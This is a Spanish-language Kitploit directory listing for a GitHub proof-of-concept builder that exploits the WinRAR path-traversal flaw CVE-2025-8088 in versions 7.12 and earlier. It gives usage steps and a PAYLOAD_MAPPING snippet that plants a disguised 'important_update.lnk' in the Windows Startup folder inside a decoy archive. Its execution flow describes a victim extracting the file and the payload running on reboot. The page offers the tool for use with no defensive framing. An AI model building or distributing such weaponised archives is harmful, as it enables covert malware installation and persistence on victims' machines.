Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8088-WinRAR-builder — Un exploit POC para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores | Kitploit
Herramientas/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAnálisis de MalwareDesarrollo de Payloads
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Un exploit POC para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-8088-WinRAR-builder

Un exploit POC para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores

🚀 Cómo funciona

  1. Crea un RAR incrustado con otros payloads
  2. Usa múltiples flujos ADS 🔄 - Adjunta flujos de payload con diferentes profundidades de path traversal
  3. Manipula las cabeceras RAR ⚙️ - Modifica la estructura del archivo para explotar la vulnerabilidad de path traversal
  4. Suelta el payload en Inicio 📂 - Intenta escribir el payload en la carpeta de inicio de Windows al extraerlo

🛠️ Uso

  1. Clona el repositorio
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Prepara los payloads
root@kitploit:~
mkdir payloads
  • Añade tus payloads a esa carpeta (exe, dll, lnk, ...)
  • Modifica PAYLOAD_MAPPING en el script
root@kitploit:~
# 2. Map our payload to corresponding destination
#   Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Add your own    
]
  1. Ejecuta el exploit
root@kitploit:~
python builder.py <decoy_file>

🔄 Flujo de ejecución

  1. La víctima extrae el RAR con WinRAR vulnerable (≤7.12)
  2. El payload se escribe en la carpeta de destino, por ejemplo:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. En el siguiente reinicio ➡️ el payload se ejecuta automáticamente

📋 Requisitos

  • Sistema operativo Windows 🪟
  • Python 3.x 🐍
  • WinRAR instalado
Descargar herramienta